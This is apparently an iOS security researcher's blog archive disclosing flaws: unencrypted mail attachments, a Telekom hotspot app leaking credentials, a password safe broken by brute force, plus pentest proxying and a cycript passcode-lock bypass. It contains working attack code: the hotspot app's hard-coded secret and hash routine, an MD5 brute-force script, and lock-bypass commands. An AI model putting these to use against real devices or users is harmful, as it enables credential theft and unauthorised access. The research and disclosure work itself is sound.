Wednesday, April 23, 2014

What Apple Missed to Fix in iOS 7.1.1

A few weeks ago, I noticed that email attachments in iOS 7 are not protected by Apple's data protection mechanisms. Clearly, this is contrary to Apple's claim that data protection "provides an additional layer of protection for (..) email messages attachments".

I verified this issue by restoring an iPhone 4 (GSM) device to the most recent iOS versions (7.1 and 7.1.1) and setting up an IMAP email account1, which provided me with some test emails and attachments. Afterwards, I shut down the device and accessed the file system using well-known techniques (DFU mode, custom ramdisk, SSH over usbmux). Finally, I mounted the iOS data partition and navigated to the actual email folder. There, I found all attachments accessible without any encryption or restriction:

# mount_hfs /dev/disk0s1s2 /mnt2
# cd /mnt2/mobile/Library/Mail/

# xxd IMAP-MY_MAILADDRESS/INBOX.imapmbox/Attachments/4/2/my_file.pdf 
0000000: 2550 4446 2d31 2e34 0a25 81e2 81e3 81cf  %PDF-1.4.%......
0000010: 81d3 5c72 0a31 2030 206f 626a 0a3c 3c0a  ..\r.1 0 obj.<<.
0000020: 2f43 7265 6174 696f 6e44 6174 6520 2844  /CreationDate (D
0000030: 3a32 3031 3330 3830 3532 3034 3830 3329  :20130805204803)
0000040: 0a2f 4d6f 6444 6174 6520 2844 3a32 3031  ./ModDate (D:201
0000050: 3330 3830 3532 3034 3830 3329 0a2f 5469  30805204803)./Ti
0000060: 746c 6520 2852 2047 7261 7068 6963 7320  tle (R Graphics 
0000070: 4f75 7470 7574 290a 2f50 726f 6475 6365  Output)./Produce
0000080: 7220 2852 2033 2e30 2e31 290a 2f43 7265  r (R 3.0.1)./Cre
0000090: 6174 6f72 2028 5229 0a3e 3e0a 656e 646f  ator (R).>>.endo

To verify that data protection was actually enabled, I also tried to access the Protected Index file (email message database). As expected, access to that file was not permitted.

# xxd Protected\ Index
xxd: Protected Index: Operation not permitted

Note: I was also able to reproduce this issue on an iPhone 5s and an iPad 2 running iOS 7.0.4.

I reported these findings to Apple. They responded that they were aware of the issue but did not say when a fix could be expected. Considering how long iOS 7 has been available by now and the sensitivity of the email attachments many enterprises share on their devices (fundamentally relying on data protection), I had expected a near-term patch. Unfortunately, even today's iOS 7.1.1 does not remedy the issue, leaving users at risk of data theft. As a workaround, concerned users may disable mail synchronization (at least on devices where the bootrom is exploitable).

1 It turned out that POP or ActiveSync email accounts behave the same way.

Friday, January 24, 2014

The Effects of Overhyped Usability

When Apps Get Out of (Privacy) Control 

Slowly but steadily, the everlasting trade-off between usability and security appears to be reaching a peak in the mobile app ecosystem. Since "ease of use" has been one of the key drivers of mobile app design in recent years, it's about time to pause for a moment and rethink whether our strong expectations of app usability have gone too far. To demonstrate how these expectations intensify the mobile privacy crisis, this blog entry describes one of my latest cases, in which I noticed an app that automagically retrieves a user's login credentials from its backend. For convenience.

The Case of the Deutsche Telekom HotSpot Login App

According to the official App Store description, the HotSpot Login App by Deutsche Telekom assists users in connecting to one of the public Telekom hotspots. It says: "Telekom mobile customers can set up their credentials automatically with the app."

Figure 1: Automatic retrieval of login credentials by pushing the "Automatic setup" button.
The username is based on a user's phone number.

In practice, users just have to push the "Automatic setup" button within the account settings dialog. A few seconds later, the login form is magically filled with the corresponding hotspot credentials (see Figure 1). Notably, the username is based on the user's phone number, which actually shouldn't be accessible from an app at all due to iOS sandbox restrictions. So how did Telekom manage this? Using private API? If so, how was it possible to bypass Apple's vetting process? Special treatment for mobile service providers? Far from it, as the following analysis will show.

By intercepting the cellular network traffic, it was easy to determine that whenever the automatic setup button is pushed, the following HTTP request is issued to the backend system:

GET /getCredentials?x-Hash=ad5af2d1ef8aead398cd132aa4d1479e07f43ac60cbeea3f73e45c9f96650f4e HTTP/1.1
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: de-de
Connection: keep-alive
x-Hash: ad5af2d1ef8aead398cd132aa4d1479e07f43ac60cbeea3f73e45c9f96650f4e
User-Agent: HotSpot%20Login/2.4.0 CFNetwork/672.0.8 Darwin/14.0.0

The only remarkable part of that request is an ominous hash value, which is placed both in a URL parameter and in a header. Obviously, that hash is meant to prevent fraudulent use of this web service.

This request resulted in the following server response:

HTTP/1.1 200 OK
x-Username: <PHONE_NUMBER>
Content-Length: 0
Content-Type: text/plain; charset=ISO-8859-1

It turned out that a user's credentials are disclosed within the two HTTP headers x-Password and x-Username, which, in turn, are used to fill the app's login form. This means that the initial assumption of private API usage to determine a user's phone number has proved to be false. Instead, a web service provided by Deutsche Telekom provides all the relevant data. In fact, this is not surprising as it should be easy for a mobile carrier to match a requester's IP address to their account information.

So far, the one and only requirement to query that web service is a single hash value, which is calculated inside the app. In more detail, the hash is computed within the method getStringMax provided by the UserCredentialManager class. This method takes the device's current public IP address and appends a static "shared secret" value (ae2454ca2df8c8c3) to it. Finally, a SHA-256 hash of the assembled string (IP + shared secret) is computed to legitimize the web service request.

Exploitation Scenarios

So, what does it all mean? When talking about risks, the good news is that the wlanauthenticate system is only accessible from the Deutsche Telekom cellular network. Moreover, the requester's IP address is used along with the hash value to authorize a request. Therefore, crawling user hotspot credentials on a large scale is not an option. However, the bad news is that any app can use this service to query the phone numbers of its users or, even worse, their hotspot passwords (limited to customers of Deutsche Telekom, of course). For this, an app only needs to issue a single HTTP request, as demonstrated above, using the following Objective-C function to calculate the required hash value. In no time, any requesting app will be provided with the user's phone number and hotspot password.

- (NSString *)calculateHash:(NSString *)ip {
    // Requires: #import <CommonCrypto/CommonDigest.h>
    NSString *sharedSecret = @"ae2454ca2df8c8c3";
    ip = [ip stringByAppendingString:sharedSecret];
    NSData *dataIn = [ip dataUsingEncoding:NSASCIIStringEncoding];
    uint8_t dataOut[CC_SHA256_DIGEST_LENGTH] = {0};
    CC_SHA256(dataIn.bytes, (CC_LONG)dataIn.length, dataOut);
    NSData *out = [NSData dataWithBytes:dataOut length:CC_SHA256_DIGEST_LENGTH];
    // Abuse -description to obtain a hex string, then strip formatting characters
    NSString *hash = [out description];
    hash = [hash stringByReplacingOccurrencesOfString:@" " withString:@""];
    hash = [hash stringByReplacingOccurrencesOfString:@"<" withString:@""];
    hash = [hash stringByReplacingOccurrencesOfString:@">" withString:@""];
    return hash;
}

This seems to be a great opportunity for the advertising industry, as it allows not only reliably tracking users based on their phone numbers, but also extending spam activities to other channels like text messaging services. This could be the beginning of "Customers Who Frequently Used This App Also Used..." messages flooding mobile messenger networks. Or the other way round: apps might harvest hotspot credentials to sell them on the black market. I'm not quite sure which of these scenarios is worse...

Notwithstanding the above, such a precarious practice is questionable insofar as Apple has significantly ramped up its efforts in recent years to restrict apps' capabilities to harm users' privacy: removal of the Unique Device ID (UDID) and of WiFi MAC address access, or the introduction of loads of new entitlements in iOS 7 to restrict access to private API, just to name a few. It seems like a waste of effort, however, when a mobile service provider circumvents those restrictions by exploiting its exposed network position.

Reactions from the Deutsche Telekom CERT

For this reason, I contacted the Deutsche Telekom CERT at the beginning of November 2013 and responsibly disclosed my findings, including a sketch of all the related privacy implications. They informed me at the end of November that the issues were still under investigation and provided a final reply at the end of December. In that e-mail they stated that they had weighed the potential risk of abuse of the web service against its enormous usability boost and decided to keep the function up and running; otherwise, the overall app usability would suffer significantly. They also pointed out that users would only be at risk when installing "malicious" apps from third-party marketplaces, and that it would be the user's fault for not sticking to official App Store apps. On a side note, I was left wondering since when Apple evaluates individual web service requests within its vetting process. Anyhow, they finally stated that "exploitation of this vulnerability would (at least) require special expertise and criminal energy". Duh!

PS: With the last update of the HotSpot Login App, the hash calculation method was renamed from "getSecureHashForIP" to the more meaningless "getStringMax". Well enough.


At the very beginning of this analysis, it turned out that the automatic setup procedure requires a cellular data connection (to enable the backend to match a requester's cellular IP address to their account information). This is enforced by the app class ReachabilityARC, which displays an error message whenever the setup is invoked from within a WiFi network. Clearly, this renders all well-known WiFi-based network capture approaches useless. Thus, in order to inspect the app's traffic, the cellular data connection has to be intercepted. This can be easily accomplished on iOS by setting up a specific APN (Access Point Name) payload that defines a reverse proxy (see Figure 2). Although those settings are not directly accessible from the iOS user interface, the Apple Configurator application allows the creation of so-called mobile configuration profiles, which in turn provide access to hidden settings like APN proxy configurations. It should be noted that, in practice, it is recommended to redirect the intercepted proxy traffic back to the iOS device in order to deliver it to the backend systems. This ensures that all requests are in fact issued via the cellular network, which prevents possible app malfunctions. For more information on how to easily proxy back to the device, please refer to my recent blog post "The Proxy Fight".

Figure 2: Intercepting cellular network connections using an iOS mobile configuration profile
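Such an APN payload can be sketched as a fragment of a .mobileconfig profile like the one below. This is a hedged illustration only: the payload keys follow Apple's configuration profile format for legacy APN payloads, while the APN name, credentials, and proxy address are placeholder assumptions, not the values used in this analysis.

```xml
<!-- Fragment of a .mobileconfig profile: an APN payload that points all
     cellular traffic at a reverse proxy. All values are placeholders. -->
<dict>
    <key>PayloadType</key>
    <string></string>
    <key>PayloadVersion</key>
    <integer>1</integer>
    <key>PayloadIdentifier</key>
    <string>com.example.apn-intercept</string>  <!-- hypothetical identifier -->
    <key>PayloadUUID</key>
    <string>00000000-0000-0000-0000-000000000000</string>
    <key>apn</key>
    <string>internet.telekom</string>           <!-- example carrier APN -->
    <key>proxy</key>
    <string></string>                <!-- host running the intercepting proxy -->
    <key>proxyPort</key>
    <integer>8080</integer>
</dict>
```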

Monday, July 29, 2013

How to Easily Spot Broken Cryptography in iOS Applications

Behind the Scenes of iPIN Lite – A Secure PIN & Password Safe

Within one of my recent research projects on mobile application security, I reviewed some password managers for iOS devices from the Apple App Store. The primary goal of this study was to demonstrate the diverse possibilities of iOS runtime injection and how our new tool Snoop-it eases security assessments of iOS applications.

Note: Snoop-it is a tool to assist dynamic analysis and blackbox security assessments of iOS applications by retrofitting existing apps with debugging and runtime tracing capabilities. It was introduced during the DeepSec Security Conference and is publicly available at (Cydia Repository:

Previous studies have indicated that many of the available "secure" password managers aren’t as secure as intended. In a study on “Secure Password Managers”, Andrey Belenko and Dmitry Sklyarov showed that many mobile password managers fail to provide the claimed level of data protection.

One quite popular app that was not included in their study is “iPIN Lite - Secure PIN & Password Safe” by IBILITIES, INC. This app caught my attention, not least because it provides an “innovative sensor keyboard” and “state-of-the-art encryption” using the “Advanced Encryption Standard and a key length of 256 bit” – so what could possibly go wrong?

Dynamic Analysis 

The typical approach to analyzing an iOS application dynamically is to examine the app on a jailbroken device. This removes the limitations imposed by Apple, provides root access to the iOS operating system, and enables access to the Objective-C runtime.

Thus, after installing iPIN Lite (version 2.27) from the Apple App Store on my test device, I got Snoop-it ready to run. During initialization of iPIN Lite, Snoop-it is transparently integrated using library injection techniques. At the same time, a webserver is started inside the app to make all of Snoop-it's debugging and runtime tracing capabilities accessible via an easy-to-use graphical web interface.

After iPIN Lite had finished launching and the sensor keyboard (a special login view; more on this later) was displayed, I pointed my browser at the Snoop-it web interface.

One feature of Snoop-it is monitoring an app's file system accesses. During initialization of iPIN Lite, several ViewControllers and resource files are loaded, obviously to present the login view. Less obvious, but far more interesting, was one access to a file named iPinSecurityModel.dat, which resides in the /Library/ipin_data/ folder of the application sandbox (see Figure 1).

Figure 1: Files accessed by iPIN Lite at startup

Although this file probably serves as the basis for iPIN Lite's security model, it was not protected by Apple's file data protection mechanisms (protection class NSFileProtectionNone). Consequently, one of the next steps was to look at the contents of this file (with Snoop-it, this is as easy as double-clicking the corresponding entry to download the file). Unfortunately, the contents of the security model file appeared to be in a binary format, probably some kind of encoding or encryption. Worse luck! So what next?

Luckily, the characteristics of the Objective-C runtime enable comprehensive dynamic analysis of running apps. One of the most important functions of the Objective-C runtime is objc_msgSend. This function serves as a central dispatcher and routes messages between existing objects. Accordingly, every method invocation in Objective-C results in one or more messages to that dispatcher. If we could intercept all messages to this dispatcher, we would get a very clear picture of the actual control flow and of what is going on inside the app.

One solution would be to monitor all calls to objc_msgSend at the debugger level using gdb. However, this approach makes an awful lot of noise, because all the background activities of the runtime show up as well. As a consequence, it's really hard to pick out app-specific calls.

A better approach is to intercept messages to objc_msgSend within the runtime itself. At the runtime level, filters can be applied to focus on app-specific classes and method invocations inside the actual app. Inspired by Aspective-C and Subjective-C, we extended those existing solutions to meet penetration testing needs and integrated a powerful method tracing feature into Snoop-it.
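To illustrate the idea of hooking a central dispatcher, here is a rough Python analogy (not Snoop-it's actual implementation): a class decorator that routes every method call through one tracing hook, much like intercepting objc_msgSend routes every Objective-C message. All names in it are invented for illustration.

```python
import functools

def trace_methods(cls):
    """Class decorator: route every method call through one tracing hook,
    loosely analogous to intercepting objc_msgSend at runtime."""
    for name, attr in list(vars(cls).items()):
        if callable(attr) and not name.startswith("__"):
            def make_wrapper(orig, meth_name):
                @functools.wraps(orig)
                def wrapper(self, *args, **kwargs):
                    # Print a trace line in the style of Snoop-it's output
                    print(f"- [{cls.__name__}({id(self):#x}) {meth_name}], args: {args}")
                    return orig(self, *args, **kwargs)
                return wrapper
            setattr(cls, name, make_wrapper(attr, name))
    return cls

@trace_methods
class PinModel:                       # hypothetical stand-in for the app's class
    def set_password_hash(self, value):
        self.password_hash = value

m = PinModel()
m.set_password_hash("098F6BCD4621D373CADE4E832627B4F6")  # prints a trace line
```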

Thus, in order to evaluate the encryption scheme, I switched over to the method tracing tab and examined the methods that were invoked during initialization of iPIN Lite. I was especially interested in the processing of the security model file, which has shown up in the file system access list earlier (see access to the file iPinSecurityModel.dat in Figure 1).

Indeed, as the tracing output reveals (see Listing 1), the security model file was accessed at the very beginning. In fact, the file was protected using a hard-coded cryptographic key that resides inside the application binary.

+ [iPinModel(0x90f68) initFromFile]
+ [iPinModel(0x90f68) securityModelFilePath]
+ [iPinModel(0x90f68) securityModelFilePath]
+ [PBKDF2(0x9124c) getKeyForPassphrase:], args: <__NSCFConstantString 0x92160: [initForWritingWithMutableData]>
+ [iPinModel(0x90f68) initSharedModelWithUnarchiver:withObjectKey:], args: <0x2002aef0>, <__NSCFConstantString 0x92150: iPINModel>
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) initWithCoder:], args: <0x2002aef0>
- [iPinModel(0x200e2130) setSensorHash:], args: <__NSCFString 0x2002a630: 8CF37F50FB1A7943FBA8EAA20FFF1E56>
- [iPinModel(0x200e2130) setEncryptedSensorCode:], args: <__NSCFData 0x2002a540, length 16 bytes>
- [iPinModel(0x200e2130) setPasswordHash:], args: <__NSCFString 0x2002a470: 098F6BCD4621D373CADE4E832627B4F6>
- [iPinModel(0x200e2130) setEncryptedPassword:], args: <__NSCFData 0x2002a2d0, length 16 bytes>
- [iPinModel(0x200e2130) setFailedAttemptsCounter:], args: 0
Listing 1: Method tracing output of iPIN Lite – Part 1

According to the tracing output shown in Listing 1, the security model file contains hashes of a sensor-code (sensorHash) and a password (passwordHash) as well as an encrypted password string (encryptedPassword). These values are transferred into an instance of the “iPinModel” class. Presumably, these hashes will be used later on during authentication to verify the sensor-code or the password entered by the user. It’s quite questionable whether a key derivation function applied on a static string really makes sense :-)

Anyway, let’s take a quick look at this sensor-code: iPIN Lite provides an “innovative sensor keyboard” which consists of 9 touch-sensitive sensors (see Figure 2). This keyboard is supposed to provide “quick access to all your PINs - without any annoying and time-killing passwords.” The authentication is based on a geometrical shape or any individual sensor combination. Therefore, the “individual sensor code is calculated by the order in which (..) these sensors have been activated and deactivated”. By now, this looks like another showcase of the everlasting conflict between usability and security. Let’s see.

Figure 2: Sensor Keyboard of iPin Lite

As soon as a sensor is touched, its color changes to blazing blue. In the background, the touch events are registered by the corresponding ViewControllers.

The following method trace (see Listing 2) shows that the sensors are numbered consecutively from 10 to 90. A touch on the upper middle sensor corresponds to a value of 20. In the end, the values of all touched sensors are joined into one common sensor-code. On every touch, an MD5 hash is calculated from the current sensor-code and compared to the sensorHash value (which was read from the security model file). Consequently, the overall security of iPIN Lite depends solely on the strength of these sensor-codes, whose search space is in fact very limited. If we could guess the sensor-code, the security model of iPIN Lite would be completely broken.

- [UISensorKeyboardImageView(0x200dc000) touched]
- [UISensorKeyboardImageView(0x200dc000) touch]
- [UISensorKeyboardImageView(0x200dc000) setTouched:], args: 1
- [UISensorKeyboardImageView(0x200dc000) numberOfTouches]
- [UISensorKeyboardImageView(0x200dc000) setNumberOfTouches:], args: 1
- [SensorKeyboardViewController(0x200c9a40) tock]
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) sensorSoundTurnedOff]
- [SensorKeyboardViewController(0x200c9a40) input]
- [UISensorKeyboardImageView(0x200dc000) value]
- [SensorKeyboardViewController(0x200c9a40) setInput:], args: <__NSCFString 0x200dec80: 20>
- [LoginViewController(0x20093ce0) valueChanged:], args: <__NSCFString 0x200dec80: 20>
+ [CryptoUtils(0x90f54) md5:], args: <__NSCFString 0x200dec80: 20>
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) sensorHash]
Listing 2: Method tracing output of iPIN Lite – Part 2

Attacking the Encryption Scheme 

Snoop-it provides a feature to invoke arbitrary methods at runtime. For this, Snoop-it queries the Objective-C runtime for all available app classes and methods during startup. In addition, Snoop-it monitors the initialization of each class and keeps track of all available instances in memory, so that instance methods can be invoked later on. Thus, to determine the current sensorHash, I used this feature and invoked the corresponding getter method of the iPinModel class. This returned a hash value of 8CF37F50FB1A7943FBA8EAA20FFF1E56 (see Figure 3).

Figure 3: Determining the actual sensorHash from an instance of the iPinModel class

In order to attack the encryption scheme, I wrote a Python script to brute force all possible sensor codes and compare them against this sensorHash. After a few seconds, the script yielded the correct sensor code sequence 10 20 30 60 90 (see Figure 4).

Output of the python script:
$ python -s 8CF37F50FB1A7943FBA8EAA20FFF1E56 
Sensor Hash: 8cf37f50fb1a7943fba8eaa20fff1e56 
Sensor Code: 1020306090 

Figure 4: Sensor Code Accepted
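The brute-force script is not shown in full above; a minimal Python reconstruction could look like the following. It assumes each of the nine sensors is used at most once per code (an assumption consistent with the recovered code), and for demonstration it recovers a code from a hash it generates itself rather than the app's actual sensorHash:

```python
import hashlib
from itertools import permutations

SENSOR_VALUES = [str(v) for v in range(10, 100, 10)]  # "10", "20", ..., "90"

def brute_force_sensor_code(target_hash, max_len=9):
    """Try all orderings of the sensor values (each sensor used at most once)
    and return the concatenated code whose MD5 matches the target hash."""
    target = target_hash.lower()
    for length in range(1, max_len + 1):
        for combo in permutations(SENSOR_VALUES, length):
            code = "".join(combo)
            if hashlib.md5(code.encode()).hexdigest() == target:
                return code
    return None

# Demo: recover a known code from its own MD5 hash
demo_hash = hashlib.md5(b"1020306090").hexdigest()
print(brute_force_sensor_code(demo_hash))  # 1020306090
```

The full search space here is under a million candidates, which is why the attack completes in seconds.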

Finally, let’s see how the actual app data is decrypted. According to the output shown in Listing 3, the sensor-code is used to derive a key and decrypt the encryptedPassword value stored in the security model file.

- [iPinModel(0x2007ee20) decryptPasswordWithKey:], args: <__NSCFString 0x2009d570: 1020306090>
- [iPinModel(0x2007ee20) encryptedPassword]
+ [PBKDF2(0xf824c) getKeyForPassphrase:], args: <__NSCFString 0x2009d570: 1020306090>
- [iPinModel(0x2007ee20) setPassword:], args: <__NSCFString 0x200f9d50: secretPassword>
- [iPinModel(0x2007ee20) calculatePasswordHash]
- [iPinModel(0x2007ee20) password]
Listing 3: Method tracing output of iPIN Lite – Part 3

Afterwards, the decrypted password (“secretPassword”) is used to derive another key, which is then used to decrypt the actual iPIN data (see Listing 4).

- [iPinModel(0x2007ee20) password]
+ [PBKDF2(0xf824c) getKeyForPassphrase:], args: <__NSCFString 0x200f9d50: secretPassword >
- [Pin(0x2002a7c0) initWithCoder:], args: <0x1f5a4320>
- [Pin(0x2002a7c0) setPinValue:], args: <__NSCFString 0x2002e3f0: 4711>
- [Pin(0x2002a7c0) setNote:], args: <__NSCFString 0x2002a760: Sample PIN Note>
- [Pin(0x1f5d1890) initWithCoder:], args: <0x1f5a4320>
- [Pin(0x1f5d1890) setPinValue:], args: <__NSCFString 0x200a5830: 1337>
- [Pin(0x1f5d1890) setNote:], args: <NULL>
- [iPINDataModel(0x2002ce80) setPinList:], args: <__NSArrayM 0x1f5c5330, size: 2>
- [iPinNavigationController(0x200317f0) init]
Listing 4: Method tracing output of iPIN Lite – Part 4

Lessons Learned

Once again, this case demonstrates that the security of an app is only as strong as its weakest link. Even if an app claims to protect your data using acknowledged encryption standards, it’s always worth looking behind the scenes. While this was quite time-consuming in the past, our new tool Snoop-it allows thorough analysis and on-the-fly manipulation of arbitrary iOS apps through an easy-to-use graphical user interface. Thus, reverse engineering apps, bypassing client-side restrictions, or unlocking additional features and premium content becomes child’s play. Using Snoop-it, the attack surface of any iOS app can be explored more efficiently, and even time-consuming steps, like evaluating encryption schemes, suddenly become possible in the twinkling of an eye.

Note: IBILITIES INC. was informed about these findings a few months ago. In the meantime, an updated version of iPIN was released.

The following video outlines the steps described above:

This video is also available at the following URL:

Thanks to Markus Troßbach for his close collaboration on developing Snoop-it!

Tuesday, July 23, 2013

The Proxy Fight, or How to Pentest an iOS App's Backend through an Existing VPN Connection

Have you ever wondered how to pentest a mobile app backend that is only available through an existing VPN connection? This is often the case when assessing the security of in-house developed enterprise apps. Usually, company-owned devices first need to establish a VPN connection to the company's intranet in order to access data from internal backend systems. While this is a good design decision from a security perspective, it makes a pentester's life a misery: as soon as a VPN connection is established, local LAN access is restricted. As a consequence, it is not as trivial as just configuring an HTTP proxy in your WiFi settings to man-in-the-middle between your app and the target web service.

To avoid wasting too much time travelling to assess those web backends on site, the following steps provide a quick and comfortable way to pentest an iOS app's web services from remote locations, even though an existing VPN connection is required.

Step 1 (on your host machine): Start your favorite intercepting proxy like Watobo, Burp, ZAP or the like (Port: 8080).

Step 2 (on your host machine): Configure your intercepting proxy to forward outgoing requests to an upstream HTTP proxy server using the following settings: Server: Port: 3128. In Burp e.g. these settings are defined within Options -> Connections -> Upstream Proxy Servers.

Step 3 (on your iDevice): Go to Cydia and install the package 3proxy.

Step 4 (on your iDevice): SSH into your iDevice and prepare a 3proxy configuration file:
iDevice:~ root# cat /var/root/3proxy.cfg
log /var/root/3proxy.log D
logformat "%d-%m-%Y %H:%M:%S %U %C:%c %R:%r %O %I %T"
proxy -p3128 -n
Step 5 (on your iDevice): Run 3proxy on your iDevice:
iDevice:~ root# 3proxy /var/root/3proxy.cfg &
[1] 11755
Step 6 (on your iDevice): Select your VPN configuration profile from the iOS Settings App (General -> VPN), scroll down to the Proxy settings and press "Manual". Here we need to fill in the following configuration: Server: Port: 8080 (this is the port on your host machine where your intercepting proxy is listening, see Step 1).

Step 7 (on your host machine): Now comes the most critical stage. As access to the local network is restricted whenever a VPN connection is established, we need to SSH into the iDevice over USB using usbmuxd. For this, get the usbmuxd source package, unpack it, and run:
$ chmod +x ./usbmuxd-1.0.8/python-client/
$ ./usbmuxd-1.0.8/python-client/ -t 22:2222

Finally, run the following command to establish an SSH connection to your iDevice over USB and to set up all required SSH port forwardings:
$ ssh -p 2222 -L 3128: -R 8080: root@

Figure 1: Overview of the proxy chaining setup

Using this setup, every HTTP request originating from your iDevice is first sent to the configured VPN proxy server. This proxy server is nothing other than the intercepting proxy running on your host machine, made accessible via the SSH tunnel over USB. After interception, your proxy forwards the requests to the actual backend via the VPN connection, using the 3proxy service running on your iDevice. From this point, you can proceed with your usual pentesting procedures as if no VPN were present at all.

Please note that you might not be able to modify the VPN proxy settings on your device when the VPN profile was issued by a Mobile Device Management (MDM) solution. In this case, you need to adjust the VPN proxy configuration via the MDM interface. But beware: some MDM solutions won't accept "localhost" (or as a valid proxy server setting.

Figure 2: Some MDM solutions like MobileIron are more restrictive on proxy server settings than iOS itself

Figure 2 shows the related error message when localhost is used as a VPN proxy setting within MobileIron. This restriction can easily be bypassed by setting up an alias for localhost in your iDevice's /etc/hosts and pointing your MDM to that alias.

Monday, June 24, 2013

The Case of iOS Wi-Fi Hotspots

Last week we published a study on the security of mobile hotspots. We found that Apple iOS generates weak default passwords when an iPhone is used as a mobile hotspot. This case serves as a perfect example of why it is always good advice to replace initial default passwords with user-defined, strong passwords.


"Passwords have to be secure and usable at the same time, a trade-off that is long known. There are many approaches to avoid this trade-off, e.g., to advise users on generating strong passwords and to reject user passwords that are weak. The same usability/security trade-off arises in scenarios where passwords are generated by machines but exchanged by humans, as is the case in pre-shared key (PSK) authentication. We investigate this trade-off by analyzing the PSK authentication method used by Apple iOS to set up a secure WPA2 connection when using an iPhone as a Wi-Fi mobile hotspot. We show that Apple iOS generates weak default passwords which makes the mobile hotspot feature of Apple iOS susceptible to brute force attacks on the WPA2 handshake. More precisely, we observed that the generation of default passwords is based on a word list, of which only 1,842 entries are taken into consideration. In addition, the process of selecting words from that word list is not random at all, resulting in a skewed frequency distribution and the possibility to compromise a hotspot connection in less than 50 seconds. Spot tests show that other mobile platforms are also affected by similar problems. We conclude that more care should be taken to create secure passwords even in PSK scenarios."
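Given the numbers in the abstract, a back-of-the-envelope calculation shows how tiny the effective keyspace is. The word-plus-four-digit-suffix format and the guessing rate below are illustrative assumptions based on the report's description of the attack setup, not measurements of my own:

```python
import math

WORDLIST_SIZE = 1_842   # effective word-list entries (from the report)
SUFFIX_SPACE = 10_000   # assumed four-digit numeric suffix, 0000-9999

keyspace = WORDLIST_SIZE * SUFFIX_SPACE
print(f"Keyspace: {keyspace:,} candidates")         # Keyspace: 18,420,000 candidates
print(f"Entropy:  {math.log2(keyspace):.1f} bits")  # ~24.1 bits

GUESSES_PER_SECOND = 390_000  # illustrative GPU cracking rate for WPA2 PSK guesses
print(f"Exhaustive search: ~{keyspace / GUESSES_PER_SECOND:.0f} s")  # ~47 s
```

At roughly 24 bits of entropy, even a modest cracking rig exhausts the whole space in under a minute, which matches the sub-50-second figure quoted above.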

For more information please refer to our technical report "Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots" (PDF) or the related page on our chair's website:

Media Coverage
  • Forbes: "Apple's iPhone Password Security Broken In 24 Seconds"
  • The Register: "Apple's screw-up leaves tethered iPhones easily crackable"
  • ars technica: "New attack cracks iPhone autogenerated hotspot passwords in seconds"
  • ZDNet: "Researchers able to predict Apple iOS-generated hotspot passwords"
  • H online: "Security issue in iOS Personal Hotspot"
  • Slashdot: "Researchers Crack iOS Mobile Hotspot Passwords In Less Than a Minute"
  • PC Magazine: "Researchers Crack iOS Personal Hotspot Passwords"
  • engadget: "Researchers able to predict iOS-generated hotspot passwords in less than a minute"
  • macrumors: "Researchers Crack iOS-Generated Hotspot Passwords in 50 Seconds"
  • Sophos Labs: "Anatomy of a cryptoglitch - Apple's iOS hotspot passphrases crackable in 50 seconds"
  • The Guardian: "iPhone passwords security"

Friday, November 30, 2012

Presentation Slides: DeepSec, Vienna, 2012

Today, I gave a talk on pentesting iOS Apps at the DeepSec Security Conference in Vienna. Please find the presentation slides below.


Apple iOS Apps are primarily developed in Objective-C, an object-oriented extension and strict superset of the C programming language. Objective-C supports the concepts of reflection, also known as introspection. This describes the ability to examine and modify the structure and behavior (specifically the values, meta-data, properties and functions) of an object at runtime.

This talk discusses the background, techniques, problems and solutions to Objective-C runtime analysis and manipulation. It will be discussed how running applications can be extended with additional debugging and runtime tracing capabilities, and how this can be used to modify instance variables and to execute or replace arbitrary object methods of an App.

Moreover, a new framework to assist dynamic analysis and security assessments of iOS Apps will be introduced and demonstrated.


Friday, February 17, 2012

iOS Runtime Injection Example #1

A common approach to implement access control within iOS apps is to display a lock screen and ask the user to enter a PIN. When the correct PIN is entered, the lock screen fades out and the main view of the application appears. By manipulating the iOS runtime it is often possible to circumvent such measures.

Let’s take SpringBoard1 as an example. The following cycript example demonstrates iOS runtime injection to bypass the iPhone/iPad passcode lock. First of all, it’s necessary to replace the method "isPasswordProtected". After patching this method, SpringBoard assumes that no passcode lock is configured. All we have to do now is remove the passcode lock screen by calling the method "unlockWithSound". Now we have full access to the home screen.

Important Note: When bypassing a passcode lock using this approach, Apple’s Data Protection remains intact. Thus, this technique does not reveal any new information compared to dumping raw data directly from the file system, but it demonstrates the diverse possibilities of iOS runtime injection.

Step 1: Attach cycript to the SpringBoard process:
iPhone:~ root# cycript -p SpringBoard

Step 2: Let’s see if the device is password protected:
cy# [SBAwayController.sharedAwayController isPasswordProtected]
1

Step 3: As a passcode lock is configured (return value of 1; see above) we have to replace the implementation of isPasswordProtected:
cy# SBAwayController.messages['isPasswordProtected'] = 
                                     function() { return NO; }

Step 4: Verification of the runtime patch:
cy# [SBAwayController.sharedAwayController isPasswordProtected]

Step 5: Finally we call the unlockWithSound method to access the home screen:
cy# [SBAwayController.sharedAwayController unlockWithSound:YES ]

Things could get even worse if an app used its own encryption routines with a hardcoded encryption key inside the app (imagine a “secure” password vault app). One approach would be to reverse engineer the app, extract the key from the disassembly, and decrypt the contents manually. But wouldn’t it be much easier to just manipulate the runtime, remove the lock screen, and have the decryption done transparently? More on this topic soon. Stay tuned.

1 SpringBoard is the standard application that manages the iOS home screen.